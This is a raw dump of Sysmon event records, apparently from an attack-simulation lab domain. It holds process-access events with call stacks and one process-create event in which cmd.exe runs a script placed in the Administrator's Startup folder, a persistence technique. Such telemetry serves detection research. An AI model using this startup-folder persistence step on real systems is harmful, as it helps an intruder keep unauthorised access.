13:30:22.263{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+514bf|C:\Windows\System32\SHELL32.dll+52065|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.263{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+51f7e|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.263{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.263{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085412C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+514bf|C:\Windows\System32\SHELL32.dll+52065|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085412C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+51f7e|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085412C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085412C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+514bf|C:\Windows\System32\SHELL32.dll+519e0|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e75c0|C:\Windows\System32\SHELL32.dll+5199c|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.248{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.232{08A6967A-476E-6000-3105-000000009A01}65806600C:\Windows\system32\conhost.exe{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.217{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-476E-6000-3105-000000009A01}6580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.217{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.217{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.217{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.217{08A6967A-4750-6000-0205-000000009A01}47886156C:\Windows\system32\csrss.exe{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.217{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.217{08A6967A-4754-6000-1705-000000009A01}34086160C:\Windows\Explorer.EXE{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\windows.storage.dll+1241fa|C:\Windows\System32\windows.storage.dll+123f5a|C:\Windows\System32\SHELL32.dll+77991|C:\Windows\System32\SHELL32.dll+767f6|C:\Windows\System32\SHELL32.dll+110821|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\Explorer.EXE+91016|C:\Windows\Explorer.EXE+10b9b|C:\Windows\Explorer.EXE+10a0e|C:\Windows\Explorer.EXE+e972|C:\Windows\System32\SHCORE.dll+2fedd|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000012390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:22.215{08A6967A-476E-6000-3005-000000009A01}6572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000012448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.654{08A6967A-4288-6000-1500-000000009A01}13242456C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.607{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.607{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.560{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-476F-6000-3405-000000009A01}6768C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.560{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-476F-6000-3405-000000009A01}6768C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.560{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-476F-6000-3405-000000009A01}6768C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.560{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-476F-6000-3405-000000009A01}6768C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.545{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-476F-6000-3405-000000009A01}6768C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-476F-6000-3405-000000009A01}6768C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.482{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 